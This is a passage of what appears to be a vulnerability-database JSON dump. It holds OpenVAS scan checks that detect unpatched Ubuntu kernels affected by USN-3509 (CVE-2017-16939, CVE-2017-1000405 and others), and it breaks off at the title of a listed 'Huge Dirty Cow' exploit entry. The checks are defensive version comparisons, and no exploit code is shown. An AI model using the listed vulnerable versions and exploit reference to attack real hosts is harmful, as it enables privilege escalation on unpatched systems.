exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1005-aws\", ver:\"4.4.0-1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843402", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843402", "type": "openvas", "title": "Ubuntu Update for linux USN-3509-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843402\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:32 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. Unfortunately, it also introduced a\n regression that prevented the Ceph network filesystem from being used. This\n update fixes the problem. We apologize for the inconvenience. Original advisory\n details: Mohamed Ghannam discovered that a use-after-free vulnerability existed\n in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use\n this to cause a denial of service (system crash) or possibly execute arbitrary\n code. (CVE-2017-16939) It was discovered that the Linux kernel did not properly\n handle copy-on- write of transparent huge pages. A local attacker could use this\n to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1013-kvm\", ver:\"4.4.0-1013.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1044-aws\", ver:\"4.4.0-1044.53\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1080-raspi2\", ver:\"4.4.0-1080.88\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1044.46\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1013.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1080.80\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843403", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843403", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3509-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_4.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-xenial USN-3509-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843403\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:42 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3509-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-2 fixed vulnerabilities in the\n Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also\n introduced a regression that prevented the Ceph network filesystem from being\n used. This update fixes the problem. We apologize for the inconvenience.\n Original advisory details: Mohamed Ghannam discovered that a use-after-free\n vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A\n local attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code. (CVE-2017-16939) It was discovered that the\n Linux kernel did not properly handle copy-on- write of transparent huge pages. A\n local attacker could use this to cause a denial of service (application crashes)\n or possibly gain administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran\n Qiu, and Shixiong Zhao discovered that the associative array implementation in\n the Linux kernel sometimes did not properly handle adding a new entry. A local\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-12193) Andrey Konovalov discovered an out-of-bounds read in the GTCO\n digitizer USB driver for the Linux kernel. A physically proximate attacker could\n use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1006-aws\", ver:\"4.4.0-1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843398", "type": "openvas", "title": "Ubuntu Update for linux USN-3509-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843398\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:55 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong Zhao discovered that the\n associative array implementation in the Linux kernel sometimes did not properly\n handle adding a new entry. A local attacker could use this to cause a denial of\n service (system crash). (CVE-2017-12193) Andrey Konovalov discovered an\n out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A\n physically proximate attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1012-kvm\", ver:\"4.4.0-1012.17\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1043-aws\", ver:\"4.4.0-1043.52\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1079-raspi2\", ver:\"4.4.0-1079.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1081-snapdragon\", ver:\"4.4.0-1081.86\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1043.45\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1012.12\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1079.79\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1081.73\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)", "edition": 1, "published": "2017-11-30T00:00:00", "title": "Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000405"], "modified": "2017-11-30T00:00:00", "id": "EXPLOITPACK:D8B1BFCB08D0FAA92CCBDBD01EF88A3F", "href": 